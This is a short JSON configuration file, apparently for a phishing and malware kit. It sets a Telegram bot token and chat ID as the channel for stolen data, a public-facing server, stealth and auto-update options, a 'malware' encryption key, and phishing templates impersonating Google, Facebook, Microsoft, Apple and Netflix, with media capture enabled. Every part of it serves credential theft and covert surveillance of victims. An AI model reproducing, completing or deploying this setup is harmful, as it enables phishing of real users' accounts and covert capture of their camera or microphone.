{
  "telegram": {
    "botToken": "8567199237:AAH4FfUeeL7mE0rMQ6uNkx1UzOXHqItu0dE",
    "chatId": "7576649672",
    "adminId": "7576649672"
  },
  "server": {
    "port": 5000,
    "host": "0.0.0.0",
    "use1pt": true,
    "hostURL": "https://your-domain.here"
  },
  "security": {
    "encryptionKey": "advanced-malware-encryption-2024",
    "stealthMode": true,
    "autoUpdate": true
  },
  "phishing": {
    "templates": ["google", "facebook", "microsoft", "apple", "netflix"],
    "redirectDelay": 3000,
    "captureMedia": true
  }
}
